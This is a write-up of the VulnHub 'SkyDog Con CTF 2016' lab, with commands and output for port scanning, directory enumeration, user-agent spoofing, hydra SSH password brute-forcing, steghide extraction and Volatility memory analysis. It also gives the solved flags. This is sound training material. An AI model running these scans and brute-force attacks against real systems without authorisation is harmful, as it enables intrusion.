Write-Up: SkyDog Con CTF 2016 – Catch Me If You Can


Introduction

So our target today is another Capture the Flag game from VulnHub.

SkyDog Con CTF 2016 - Catch Me If You Can [Download]

Difficulty: Beginner/Intermediate

Instructions: The CTF is a virtual machine and works best in Virtual Box. Download the OVA file, open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above, make sure that USB 2.0 is disabled before booting up the VM. The networking is set up for a Host-Only Adapter by default, but you can change this before booting up depending on your networking setup. The Virtual Machine Server is configured for DHCP. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help.

Flags

The eight flags are in the form of flag{MD5 Hash}, such as flag{1a79a4d60de6718e8e5b326e338ae533}

Flag #1 Don’t go Home Frank! There’s a Hex on Your House.

Flag #2 Obscurity or Security?

Flag #3 Be Careful Agent, Frank Has Been Known to Intercept Our Traffic.

Flag #4 A Good Agent is Hard to Find.

Flag #5 The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

Flag #6 Where in the World is Frank?

Flag #7 Frank Was Caught on Camera Cashing Checks and Yelling - I’m The Fastest Man Alive!

Flag #8 Frank's Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Looks like we should have a good time with this one, let's get started! After downloading and booting our target, it looks like we have another Ubuntu 16 host.

Network Scanning

Firing up 'nmap', we can find our target on our Host-Only network.

root@nethunterarch:~# nmap -sn -T5 192.168.56.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-15 08:14 MST
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (1 host up) scanned in 10.53 seconds
root@nethunterarch:~# nmap -sn -T5 192.168.56.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-15 08:16 MST
Nmap scan report for 192.168.56.100
Host is up (0.000077s latency).
MAC Address: 08:00:27:53:A6:6E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00029s latency).
MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.23 seconds
root@nethunterarch:~# nmap -T5 -A 192.168.56.102

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-15 08:19 MST
Nmap scan report for 192.168.56.102
Host is up (0.00031s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
443/tcp open   ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after: 2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

Checking out the website, we notice some strange comments that lead us to an interesting string in the comments of a JS script.

<!--[If IE4]><script src="/oldIE/html5.js"></script><![Make sure to remove this before going to PROD]-->
/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */ 
/*! HTML5 Shiv v3.6 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed */ 
/* Source: https://github.com/aFarkas/html5shiv — No longer maintained */

Also, while searching for comments, I found the following:

/* maindev -  6/7/02 Adding temporary support for IE4 FBI Workstations */
/* newmaindev -  5/22/16 Last maindev was and idoit and IE4 is still Gold image -@Support doug.perterson@fbi.gov */

It looks like we may have a viable username for later... Now, on to that strange string. Running it through 'hashid' as well as HashKiller doesn't reveal anything... then, after running this bad boy through quite a gauntlet, I ran into some luck: it was definitely a flag, but dumped into hex! Using RapidTables I was able to decode it...

flag{7c0132070a0ef71d542663e9dc1f5dee}

7c0132070a0ef71d542663e9dc1f5dee MD5 : nmap

At this point I realize that I never checked for uncommon ports in my network scan. Let's get that out of the way, since apparently that is the direction we are going anyhow, and while I'm at it I'm going to give dirb a workout and see if anything cool jumps out.

root@nethunterarch:~# dirb http://192.168.56.102 /usr/share/dirb/wordlists/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Feb 15 09:53:51 2017
URL_BASE: http://192.168.56.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/404 (CODE:200|SIZE:18360)
==> DIRECTORY: http://192.168.56.102/assets/
+ http://192.168.56.102/favicon (CODE:200|SIZE:1150)
+ http://192.168.56.102/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.56.102/index (CODE:200|SIZE:18357)
+ http://192.168.56.102/personnel (CODE:403|SIZE:131)
+ http://192.168.56.102/rules (CODE:200|SIZE:31156)
+ http://192.168.56.102/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.56.102/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed Feb 15 09:54:00 2017
DOWNLOADED: 20458 - FOUND: 7

Well, it looks like we have an interesting directory, 'personnel'. Visiting it, we get the following...

ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....

We can check this out later; moving on to the nmap scan.

root@nethunterarch:~/Documents/skydog# nmap -T5 -p- --open 192.168.56.102

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-15 08:58 MST
Nmap scan report for 192.168.56.102
Host is up (0.00029s latency).
Not shown: 65531 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
443/tcp   open  https
22222/tcp open  easyengine
MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 53.76 seconds
root@nethunterarch:~/Documents/skydog# nc 192.168.56.102 22222
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.1

Looks like we found an interesting port for SSH, and to boot we got a flag!

root@nethunterarch:~# ssh -p 22222 doug.peterson@192.168.56.102
###############################################################
#                         WARNING                             #
#        FBI - Authorized access only!                 #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#    Flag{53c82eba31f6d416f331de9162ebe997}              #
###############################################################
doug.peterson@192.168.56.102's password:
Permission denied, please try again.
doug.peterson@192.168.56.102's password:
Permission denied, please try again.
doug.peterson@192.168.56.102's password:
Permission denied (publickey,password).

Using HashKiller, we have some luck cracking the hash...

53c82eba31f6d416f331de9162ebe997 MD5 : encrypt

I'm not sure WTF that means, but cool... we got our second flag. After some pondering I decided to move back to the HTTPS website; maybe that is what the flag's hint is about. Pulling it up in a browser gives us an SSL warning, and purely out of habit (completely not on purpose here) I view the information on the cert, and what do I find but another flag! W00t.

flag3{f82366a9ddc064585d54e3f78bde3221}

f82366a9ddc064585d54e3f78bde3221 MD5 : personnel

Well, look at that, we are back to that 'personnel' directory... The page source gives us nothing, so how would the page validate where you are coming from? Maybe a user agent? Looking back at the information we have gathered so far takes me back to the comment by Doug about IE4 still being the Gold Image. So, pulling out an old dusty list of user-agent strings, I finally found one for IE 4.

Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)

Then, firing up the Firefox 'User-Agent Switcher' addon, we hit some pay dirt! Looks like we got a portal.

And a flag at second glance! Down in the bottom right...

14e10d570047667f904261e6d08f520f MD5 : evidence

We also find a strange comment in one of the lists.

  • Sixty-one on 7/4/6008

This looks like 617468; I wonder if this is a password!? But giving it a go with doug.perterson as well as hanratty gives us nothing... After looking at the clue after the flag, 'Clue = new+flag', I try that as a directory, thinking it is probably not in my wordlist for dirb... and yep, it looks like now we need a username and password! Trying the same usernames as before we get no luck.

At this point I struggled for a while, thinking I missed something technical. Time to turn to Google and maybe build on the information I have collected so far. A quick Google search for "doug perterson" fbi turns up nothing but walkthroughs for the game. Another search for "hanratty" fbi and we find out this is a character from the movie, and his first name is Carl. This could be good information and give us a possible username: if we follow the same convention as doug.perterson, we now have carl.hanratty too. The hint for flag five says "The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices", so maybe we need to learn about Carl, and while we do that, fire off a hydra brute force just to keep pressure on the target.

root@nethunterarch:~# hydra -l carl.hanratty -P /usr/share/wordlists/rockyou.txt 192.168.56.102 ssh -s 22222
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-02-15 10:52:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service ssh on port 22222

*Note: this brute-force attempt was a failure; I really just included it to keep the story straight.

We learn from Wikipedia that Carl Hanratty has an ex-wife and a daughter:

Tom Hanks as Carl Hanratty, an FBI agent who pursues Frank for most of the film. 
Hanratty is often teased by other agents who take check fraud as a joke. Hanratty is divorced, 
and his daughter and ex-wife live in Chicago. In the end, Carl and Frank become great friends.

That information seems 'personal', which is 'against best practices'. Searching for Carl's ex-wife doesn't yield anything; she must not be a named character in the story. Looking up the daughter, she is not a character either, however Carl mentions her in a line of dialogue.

Carl Hanratty: She was four when I left. Now she's 15. My wife's been remarried for 11 years. 
I see Grace every now and again.

Giving the username 'carl.hanratty' and password 'grace' a shot fails, but the password 'Grace' works! We are in! Giving those same credentials a shot on SSH falls short... bummer.

Starting to look around, we go to the 'Evidence Summary File' link and poof! A flag!

flag{117c240d49f54096413dd64280399ea9}

117c240d49f54096413dd64280399ea9 MD5 : panam

So I'm not sure what this hint is getting at yet, but I am sure we will figure it out. Looking around a bit more, we come across an image under the 'possible location' link. Thinking we may be on the right track, I pull down the image and run it through 'steghide'.

root@nethunterarch:~/Documents/skydog# steghide --info image.jpg
"image.jpg":
  format: jpeg
  capacity: 230.1 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

Aha! It looks like we have some steganography, but what is the passphrase? Going through my notes and trying all the possible candidates, plus a few out of some common wordlists, I try the plaintext of the last flag, mainly because I still don't understand its relevance.

root@nethunterarch:~/Documents/skydog# steghide --info image.jpg -p panam
"image.jpg":
  format: jpeg
  capacity: 230.1 KB
  embedded file "flag.txt":
    size: 71.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
root@nethunterarch:~/Documents/skydog# steghide extract -sf image.jpg -p panam
wrote extracted data to "flag.txt".
root@nethunterarch:~/Documents/skydog# cat flag.txt 
flag{d1e5146b171928731385eb7ea38c37b8}
=ILoveFrance

clue=iheartbrenda

Sure enough! We have our next flag and a hint to boot.

d1e5146b171928731385eb7ea38c37b8 MD5 : ILoveFrance

So at this point I spent a good amount of time trying to figure out the next step, probably reading way too deep into the movie. In the end I decided to make a targeted wordlist and see if I could force my way into the SSH server running on port 22222. Not to get sidetracked, but to explain my process: I used 'cewl' to crawl the website on the target and then simply added some words from the movie and my notes; after that I fired up 'John the Ripper' to run permutations against my small wordlist to come up with something better.

root@nethunterarch:~/Documents/skydog# wc -l skydogwordlist
26969 skydogwordlist

Now, with 26k usernames and passwords to try, I wired up 'Hydra' and waited...

root@nethunterarch:~/Documents/skydog# hydra -L skydogwordlist -P skydogwordlist -s 22222 192.168.56.102 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-02-15 15:45:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 727326961 login tries (l:26969/p:26969), ~710280 tries per task
[DATA] attacking service ssh on port 22222
[22222][ssh] host: 192.168.56.102   login: barryallen   password: iheartbrenda
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-02-16 03:08:35

Awesome! Now to move on!

root@nethunterarch:~/Documents/skydog# ssh -p 22222 barryallen@192.168.56.102
###############################################################
#                         WARNING                             #
#        FBI - Authorized access only!                 #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#    Flag{53c82eba31f6d416f331de9162ebe997}              #
###############################################################
barryallen@192.168.56.102's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

14 packages can be updated.
7 updates are security updates.

barryallen@skydogconctf2016:~$

A quick look in our current directory and we've got another flag!

barryallen@skydogconctf2016:~$ ls
flag.txt  security-system.data
barryallen@skydogconctf2016:~$ cat flag.txt
flag{bd2f6a1d5242c962a05619c56fa47ba6}

bd2f6a1d5242c962a05619c56fa47ba6 MD5 : theflash

It looks like we have another, rather interesting file as well.

barryallen@skydogconctf2016:~$ ls -lt security-system.data
-rw-r--r-- 1 barryallen barryallen 74762682 Oct 10 18:29 security-system.data
barryallen@skydogconctf2016:~$ file security-system.data
security-system.data: Zip archive data, at least v2.0 to extract

Grabbing a local copy so we can dissect it...

root@nethunterarch:~# scp -P 22222 barryallen@192.168.56.102:/home/barryallen/security-system.data security-system.data
###############################################################
#                         WARNING                             #
#        FBI - Authorized access only!                 #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#    Flag{53c82eba31f6d416f331de9162ebe997}              #
###############################################################
barryallen@192.168.56.102's password:
security-system.data                          100%   71MB  30.4MB/s   00:02

After unzipping the archive, it looks like we have another roadblock: it's just a data file...

root@nethunterarch:~/Documents/skydog# unzip security-system.data
Archive:  security-system.data
replace security-system.data? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: security-system.data
root@nethunterarch:~/Documents/skydog# file security-system.data
security-system.data: data

In an attempt to identify what we have, I run the file through 'strings'.

root@nethunterarch:~/Documents/skydog# strings security-system.data
================== DOUBLE FAULT ================================
===== STACK SEGMENT OVERRUN or NOT PRESENT FAULT ===============
============== GENERAL PROTECTION FAULT ========================
=================== PAGE FAULT =================================
** At linear address %lx
===================== EXCEPTION ================================
tr=%x cr0=%lx cr2=%lx cr3=%lx
gdt limit=%x base=%lx idt limit=%x base=%lx
cs:eip=%x:%lx ss:esp=%x:%lx errcode=%x
eax=%lx ebx=%lx ecx=%lx edx=%lx
ds=%x es=%x
edi=%lx esi=%lx ebp=%lx cr0=%lx
fs=%x gs=%x
flags=%lx

Awesome, a portion of the massive output from the 'strings' command early on gives me the idea that this is maybe a memory dump... an easy way to tell for sure: let's warm it up with 'Volatility'.

root@nethunterarch:~/Documents/skydog# volatility -f security-system.data imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/root/Documents/skydog/security-system.data)
                      PAE type : PAE
                           DTB : 0x33e000L
                          KDBG : 0x80545b60L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-10-10 22:00:50 UTC+0000
     Image local date and time : 2016-10-10 18:00:50 -0400

Okay, looks like we are in business. Running through the options and tools within Volatility, I find something interesting...

root@nethunterarch:~/Documents/skydog# volatility -f security-system.data --profile=WinXPSP2x86 cmdscan
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: csrss.exe Pid: 560
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 2 LastAdded: 1 LastDisplayed: 1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x2d4
Cmd #0 @ 0x1024400: cd Desktop
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt

This looks like more hex; let's run it through RapidTables again. BINGO!

flag{841dd3db29b0fbbd89c7b5be768cdc81}

841dd3db29b0fbbd89c7b5be768cdc81 MD5 : Two[space]little[space]mice
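Both hex-dumped flags on this page, the contiguous string from the html5.js comment and the space-separated bytes echoed into code.txt in the memory image, decode the same way, and every flag body is an MD5 of a short word. The script below is an added example, not part of the original write-up or the CTF: it decodes both strings offline and checks the digests against the plaintexts the write-up recovered from HashKiller, using hashlib rather than an online lookup.

```python
"""Decode the hex-dumped flags from this CTF and check their MD5 plaintexts.

Added example, not from the original write-up. The hex strings and the
candidate words are the ones quoted on the page; nothing here touches
the network.
"""
import hashlib
import re
from typing import Iterable, Optional, Tuple

# Inputs copied from the write-up: contiguous hex from the /oldIE/html5.js
# comment ...
JS_COMMENT_HEX = (
    "666c61677b37633031333230373061306566373164353432363633653964633166356465657d"
)
# ... and space-separated bytes from the cmd.exe history in the memory image.
CMDSCAN_HEX = (
    "66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 "
    "37 62 35 62 65 37 36 38 63 64 63 38 31 7d"
)

# Plaintexts HashKiller reported for the eight flag digests on this page.
REPORTED_PLAINTEXTS = [
    "nmap", "encrypt", "personnel", "evidence",
    "panam", "ILoveFrance", "theflash", "Two little mice",
]

# Accepts flag{...}, the banner's Flag{...} and the cert's flag3{...} variant.
FLAG_RE = re.compile(r"^flag\d?\{([0-9a-fA-F]{32})\}$", re.IGNORECASE)


def decode_hex(text: str) -> str:
    """Decode hex to ASCII, tolerating spaces, colons, commas and 0x prefixes."""
    cleaned = re.sub(r"[^0-9a-fA-F]", "", text.replace("0x", ""))
    if len(cleaned) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(cleaned).decode("ascii")


def extract_flag_digest(flag: str) -> str:
    """Return the 32-hex-digit body of a flag string, lower-cased."""
    match = FLAG_RE.match(flag.strip())
    if not match:
        raise ValueError(f"not a flag: {flag!r}")
    return match.group(1).lower()


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def identify_plaintext(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate whose MD5 equals digest, or None if none matches."""
    digest = digest.lower()
    for word in candidates:
        if md5_hex(word) == digest:
            return word
    return None


def resolve_hex_flag(hex_text: str, candidates: Iterable[str]) -> Tuple[str, Optional[str]]:
    """Decode a hex-dumped flag and look up its digest in one step."""
    flag = decode_hex(hex_text)
    return flag, identify_plaintext(extract_flag_digest(flag), candidates)


if __name__ == "__main__":
    for label, blob in (("js comment", JS_COMMENT_HEX), ("cmdscan", CMDSCAN_HEX)):
        flag, word = resolve_hex_flag(blob, REPORTED_PLAINTEXTS)
        print(f"{label:>10}: {flag} -> {word or 'no match in candidate list'}")
```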

So, this being the last flag, it looks like we are done. However, I didn't understand it: two little mice? So, before wrapping this up, I do a quick Google search, and there it is.

Frank Abagnale Sr.: Two little mice fell in a bucket of cream. The first mouse quickly gave up and drowned. 
The second mouse, wouldn't quit. He struggled so hard that eventually he churned that cream into butter and 
crawled out. Gentlemen, as of this moment, I am that second mouse.

Anyhow, a pretty fun CTF, and I liked the movie references (although challenging, as I have only seen the movie once, a VERY long time ago). Until next time...